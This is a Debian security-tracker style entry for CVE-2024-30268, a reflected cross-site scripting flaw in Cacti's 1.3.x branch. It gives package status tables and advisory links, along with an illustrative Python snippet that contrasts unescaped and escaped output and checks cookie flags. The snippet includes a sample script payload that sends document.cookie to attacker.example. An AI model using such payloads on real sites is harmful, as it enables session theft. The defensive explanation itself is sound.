CVE-2024-30268

Name: CVE-2024-30268
Description: Cacti provides an operational monitoring and fault management framework. A reflected cross-site scripting vulnerability on the 1.3.x DEV branch allows attackers to obtain cookies of administrator and other users and fake their login using obtained cookies. This issue is fixed in commit a38b9046e9772612fda847b46308f9391a49891e.
Source: CVE (links: NVD; CERT, LWN, oss-sec, fulldisc, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more)
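The bug class named in the description is reflection of a request parameter into HTML without encoding, which lets an injected script read document.cookie and send it elsewhere. The block below is an added illustration in Python, not Cacti's own PHP code and not the fixing commit; the parameter name "title", the payload and the Set-Cookie header are constructed for the example, since the advisory text here does not identify the affected parameter. It shows the vulnerable rendering beside the encoded form, and a check of the session cookie attributes that limit the impact of this kind of bug.

```python
import html
from urllib.parse import parse_qs

# Constructed sample query string (not from the advisory): the "title"
# parameter carries a script that exfiltrates document.cookie.
# Decoded: <script>document.location="http://attacker.example/?c="+document.cookie</script>
SAMPLE_QUERY = (
    "title=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fattacker.example"
    "%2F%3Fc%3D%22%2Bdocument.cookie%3C%2Fscript%3E"
)


def render_vulnerable(query: str) -> str:
    """Reflect the parameter into the page verbatim: the reflected XSS pattern."""
    title = parse_qs(query).get("title", [""])[0]
    return f"<h1>{title}</h1>"


def render_fixed(query: str) -> str:
    """Same page, but the value is HTML-encoded before it is reflected."""
    title = parse_qs(query).get("title", [""])[0]
    return f"<h1>{html.escape(title, quote=True)}</h1>"


def reflects_script(page: str) -> bool:
    """True if the rendered page still contains a live <script> element."""
    return "<script>" in page.lower()


def cookie_hardening_gaps(set_cookie: str) -> list:
    """Return the session-cookie attributes missing from a Set-Cookie header.

    HttpOnly keeps the cookie out of document.cookie, so a script injected
    via XSS cannot read it directly; Secure and SameSite narrow where the
    browser will send it. None of these fixes the XSS itself.
    """
    attrs = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    gaps = []
    if "httponly" not in attrs:
        gaps.append("HttpOnly")
    if "secure" not in attrs:
        gaps.append("Secure")
    if not any(a.startswith("samesite=") for a in attrs):
        gaps.append("SameSite")
    return gaps


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(SAMPLE_QUERY))
    print("fixed:     ", render_fixed(SAMPLE_QUERY))
    # Constructed header for a hypothetical session cookie, not Cacti's.
    print("gaps:", cookie_hardening_gaps("session=abc123; Path=/"))
```

HttpOnly stops the document.cookie read that the description mentions, but a script running in the victim's origin can still issue authenticated requests from the page itself, so cookie attributes are defence in depth; the actual fix is the output encoding in the referenced upstream commit.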

Vulnerable and fixed packages

The table below lists information on source packages.

Source Package   Release              Version                 Status
cacti (PTS)      buster               1.2.2+ds1-2+deb10u4     undetermined
                 buster (security)    1.2.2+ds1-2+deb10u6     undetermined
                 bullseye             1.2.16+ds1-2+deb11u2    undetermined
                 bullseye (security)  1.2.16+ds1-2+deb11u3    undetermined
                 bookworm             1.2.24+ds1-1+deb12u1    undetermined
                 bookworm (security)  1.2.24+ds1-1+deb12u2    undetermined
                 trixie               1.2.26+ds1-1            undetermined
                 sid                  1.2.27+ds1-2            undetermined

The information below is based on the following data on fixed versions.

Package   Type     Release     Fixed Version   Urgency   Origin   Debian Bugs
cacti     source   (unstable)  undetermined

Notes

https://github.com/Cacti/cacti/security/advisories/GHSA-9m3v-whmr-pc2q
https://github.com/Cacti/cacti/commit/a38b9046e9772612fda847b46308f9391a49891e
Check: this might only affect 1.3.y.
